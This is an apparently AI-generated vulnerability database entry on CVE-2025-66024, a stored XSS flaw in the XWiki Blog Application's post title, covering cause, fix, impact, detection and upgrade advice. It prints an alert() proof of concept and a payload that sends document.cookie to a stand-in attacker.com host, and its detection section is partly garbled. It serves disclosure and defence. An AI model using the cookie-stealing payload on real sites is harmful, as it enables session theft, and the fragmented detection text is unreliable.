
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-66024 is a Stored Cross-Site Scripting (XSS) vulnerability in the XWiki Blog Application (org.xwiki.contrib.blog:application-blog-ui) that allows authenticated users with blog post creation or editing permissions to inject malicious JavaScript via the blog post title field. The vulnerability was disclosed on March 4, 2026, and affects all versions of the application prior to 9.15.7. It carries a CVSS v4.0 base score of 8.6 (High) and a CVSS v3.1 base score of 9.0 (Critical) (Github Advisory). The vulnerability was reported by Łukasz Rybak (Github Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation) — specifically, the blog post title value is injected directly into the HTML <title> tag without proper HTML escaping in the BlogCode.xml template. An attacker can craft a title containing a payload such as </title><script>alert('XSS in title blog')</script> to break out of the <title> context and inject arbitrary JavaScript into the rendered page. The fix, applied in commit cca87f0, wraps the title value with both rendering escaping and HTML escaping via $escapetool.html(...) before insertion into the page (GitHub Commit). Exploitation requires only low-level authenticated access (blog post creation rights) and passive user interaction (a victim viewing the blog home page) (Github Advisory).
Successful exploitation allows the injected script to execute in the browser of any user — including administrators — who views the blog home page or the affected post. This enables session hijacking (theft of authentication cookies or tokens), privilege escalation by performing actions on behalf of higher-privileged users, and potential further compromise of the XWiki instance. The vulnerability's scope is changed, meaning the impact extends beyond the attacker's own session to all viewers of the affected content (Github Advisory).
<title> tag, such as:</title><script>document.location='https://attacker.com/steal?c='+document.cookie</script></title>, <script>) in the title parameter; unusual POST requests to blog post creation endpoints.BlogCode.xml or other blog application template files if an attacker escalated to admin and modified templates.?c=<session_token>).<script> elements, or JavaScript URIs visible in the XWiki blog post list or database.Upgrade the XWiki Blog Application (org.xwiki.contrib.blog:application-blog-ui) to version 9.15.7 or later, which adds proper HTML escaping of the post title before rendering it in the <title> tag (Github Advisory). The XWiki Blog Application maintainers are not aware of any configuration-based workarounds; patching is the only remediation. As an interim measure, administrators may consider restricting blog post creation permissions to highly trusted users only until the patch can be applied.
The vulnerability was reported by security researcher Łukasz Rybak and published by XWiki maintainer tmortagne on March 4, 2026 (Github Advisory). No significant broader media coverage or notable public researcher commentary beyond the advisory and standard vulnerability aggregator coverage has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."